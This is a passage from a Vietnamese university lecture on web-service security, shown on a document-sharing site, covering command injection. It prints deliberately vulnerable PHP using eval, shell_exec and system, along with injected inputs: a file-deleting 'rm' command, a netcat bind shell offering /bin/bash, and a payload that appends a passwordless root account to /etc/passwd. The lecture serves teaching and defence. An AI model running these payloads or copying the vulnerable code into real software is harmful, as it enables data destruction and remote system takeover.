Trang chủ » Công Nghệ Thông Tin » An toàn thông tin

31 trang

52 lượt xem

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên;... Mời các bạn cùng tham khảo!

Chủ đề:

codabach1016

Quản trị rủi ro an ninh mạng

BÀI 9.

AN TOÀN DỊCH VỤ WEB

SQL INJECTION, XSS, CSRF

Bùi Trọng Tùng,

Viện Công nghệ thông tin và Truyền thông,

Đại học Bách khoa Hà Nội

Nội dung

•Tổng quan về hoạt động của dịch vụ Web

•Tấn công dạng Command Injection

•SQL Injection

•XSS

•CSRF

•Quản lý phiên

1. TẤN CÔNG DẠNG COMMAND

INJECTION

Bùi Trọng Tùng,

Viện Công nghệ thông tin và Truyền thông,

Đại học Bách khoa Hà Nội

Command Injection

•Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi

thực thi kịch bản (servlet) trên web server

Không phân biệt được dữ liệu và mã nguồn trong đối số

•Ví dụ: Website chứa servlet cung cấp tính năng tính toán

biểu thức bất kỳ qua hàm eval()

…

$in = $_GET[‘exp'];

eval('$ans = ' . $in . ';');

…

http://site.com/calc.php

Nội dung biểu thức được truyền

qua đối số exp. Ví dụ:

http://site.com/calc.php?exp=1+1

• Servlet thực thi như thế nào nếu truyền đối số như sau:

http://site.com/calc.php?exp=“10 ; system(‘rm *.*’)”

Command Injection – Ví dụ khác

ServerClient

1. http://site.com/exec/

2. Send page

<p>Enter an IP address below:</p>

</form>

Ô nhập dữ

liệu

Command Injection – Ví dụ khác

ServerClient

Send output

<p>Enter an IP address below:</p>

</form>

…

$t = $_REQUEST[‘ip'];

$o = shell_exec(‘ping –C 3’ . $t);

echo $o

…

PHP exec program

Command Injection – Ví dụ khác

ServerClient

2. Send page …

$t = $_REQUEST[‘ip'];

$o = shell_exec(‘ping –C 3’ . $t);

echo $o

…

PHP exec program

Command Injection – Ví dụ khác

ServerClient

2. Send page

PHP exec program

…

$t = $_REQUEST[‘ip'];

$o = shell_exec(‘ping –C 3’ . $t);

echo $o

…

127.0.0.1;ls

Command Injection – Ví dụ khác

•Thực thi shell

netcat –v –e ‘/bin/bash’ –l –p 31337

ip=127.0.0.1+%26+netcat+-v+-

e+'/bin/bash'+-l+-p+31337&submit=submit

Command Injection – Ví dụ khác

•Mã PHP để gửi email:

•Chèn mã thực thi khi truyền giá trị cho đối số:

•Hoặc

$email = $_POST[“email”]

$subject = $_POST[“subject”]

system(“mail $email –s $subject < /tmp/joinmynetwork”)

http://yourdomain.com/mail.php?

email=hacker@hackerhome.net &

subject=foo < /usr/passwd; ls

http://yourdomain.com/mail.php?

email=hacker@hackerhome.net&subject=foo;

echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF

Chủ đề:

Quản trị rủi ro an ninh mạng

Tài liệu liên quan

Bài giảng An toàn và bảo mật hệ thống thông tin: Chương 3

Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF

Bài giảng An ninh mạng - Bài 6: An toàn bảo mật trong mạng TCP/IP

Bài giảng An ninh mạng - Bài 5: Xác thực chủ thể

Bài giảng An ninh mạng - Bài 1: Tổng quan về an toàn an ninh mạng

Bài giảng An ninh mạng: Chương 7 - Bùi Trọng Tùng

Giáo trình An toàn mạng (Nghề: Quản trị mạng - Trình độ: Cao đẳng) - Trường Cao đẳng nghề Cần Thơ

Bài giảng Thương mại điện tử (E-commerce): Chương 6 - GV. Đỗ Thị Nhâm

Tài liệu hướng dẫn bảo đảm an toàn và bảo mật hệ thống thông tin năm 2022

Tài liêu mới

Green Supply Chain Circular Economy Evaluation System Based on Industrial Internet of Things and Blockchain Technology under ESG Concept

Ứng dụng thị giác máy tính và trí tuệ nhân tạo phát hiện đối tượng trên ảnh phục vụ công tác bảo vệ bí mật nhà nước

Khung giám sát và phản ứng sự cố an ninh tự động: Thực tiễn tốt cho các doanh nghiệp vừa và nhỏ

Mô hình học sâu Long Short-Term Memory phát hiện tấn công DDoS

Mô hình C-ViDNet hỗ trợ phát hiện bạo lực trong học đường

Tài liệu Đào tạo nhận thức an toàn thông tin

Đồ án tốt nghiệp: Nghiên cứu xây dựng giải pháp phát hiện và săn tìm mối đe dọa an ninh mạng dựa trên công nghệ Security Onion

Static analysis and machine learning-based malware detection system using PE header feature values

Tài liệu hướng dẫn làm bài tập lớn học phần An toàn bảo mật thông tin

Câu hỏi ôn tập An toàn mạng

Sổ tay Hướng dẫn tuân thủ quy định pháp luật và tăng cường bảo đảm an toàn hệ thống thông tin theo cấp độ (Phiên bản 1.0)

Cẩm nang phòng chống, giảm thiểu rủi ro từ tấn công Ransomware

Mật mã DES và những cải tiến

Lecture Cryptography: Cryptography Applications (Part 2) - PhD. Ngoc-Tu Nguyen

Lecture Cryptography: Cryptography Applications (Part 1) - PhD. Ngoc-Tu Nguyen

AI tóm tắt

Giới thiệu tài liệu

Đối tượng sử dụng

Từ khoá chính

Nội dung tóm tắt

Giới thiệu

Về chúng tôi

Việc làm

Quảng cáo

Liên hệ

Chính sách

Thoả thuận sử dụng

Chính sách bảo mật

Chính sách hoàn tiền

DMCA

Hỗ trợ

Hướng dẫn sử dụng

Đăng ký tài khoản VIP

093 303 0098

support@tailieu.vn

Phương thức thanh toán

Theo dõi chúng tôi

Facebook

Youtube

TikTok